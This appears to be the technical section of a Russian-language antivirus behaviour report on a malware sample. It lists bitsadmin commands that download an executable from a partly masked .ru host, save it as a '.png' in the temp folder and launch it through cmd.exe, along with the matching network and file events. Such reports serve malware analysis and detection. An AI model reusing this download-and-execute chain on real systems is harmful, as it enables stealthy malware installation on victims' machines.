Техническая информация
- '<SYSTEM32>\bitsadmin.exe' /reset
- '<SYSTEM32>\bitsadmin.exe' /create ""
- '<SYSTEM32>\bitsadmin.exe' /addfile "" "http://un##t.ru/outlast.exe" "%TEMP%\tmpfile.png"
- '<SYSTEM32>\bitsadmin.exe' /setproxysettings "" NO_PROXY
- '<SYSTEM32>\bitsadmin.exe' /setnotifyflags "" 1
- '<SYSTEM32>\bitsadmin.exe' /setnotifycmdline "" "<SYSTEM32>\cmd.exe" "/c bitsadmin /complete \"\"&start \"\" \"%TEMP%\tmpfile.png\""
- '<SYSTEM32>\bitsadmin.exe' /resume ""
- %TEMP%\bit54d3.tmp
- %TEMP%\bit54d3.tmp
- %TEMP%\bit54d3.tmp в %TEMP%\tmpfile.png
- 'un##t.ru':80
- http://un##t.ru/outlast.exe
- DNS ASK un##t.ru
- '%TEMP%\tmpfile.png'
- '<SYSTEM32>\cmd.exe' bitsadmin /complete ""&start "" "%TEMP%\tmpfile.png"
- '<SYSTEM32>\bitsadmin.exe' /complete ""